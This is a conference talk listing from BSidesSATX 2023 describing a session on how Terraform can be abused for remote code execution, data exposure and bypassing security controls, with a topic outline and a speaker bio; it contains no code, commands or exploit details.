BSidesSATX 2023

Infrastructure as Remote Code Execution: How to abuse Terraform to elevate access
2023-06-10, 15:00–15:45, Track 3 (Moody Rm 102)

This talk will focus on ways to abuse the use of Terraform to elevate privileges, expose data, and gain further footholds in environments from a developer's perspective. We'll cover the common uses of Terraform and how a malicious actor could abuse Terraform and even bypass security controls to execute unapproved code. This talk will include multiple demos of ways to exploit Terraform cloud.

The talk will focus on research done on Terraform implementations and ways a malicious user could abuse it. The talk will cover how Terraform works, how common Terraform security controls are applied, and multiple ways to bypass them and gain further access to environments.


How Terraform works
How plan and apply impact security controls
Remote code execution methods:
External data
Data gathering methods:
Data sources
Security control bypasses

This talk will introduce people new to Terraform to the concepts and then explain in-depth ways it can be abused.

Michael McCabe is the president of Cloud Security Partners. Michael helps clients migrate their workloads to the cloud in a secure and managed way. He's worked with large financials during their cloud migrations and transformations. He focuses on creating secure and approachable solutions for his clients.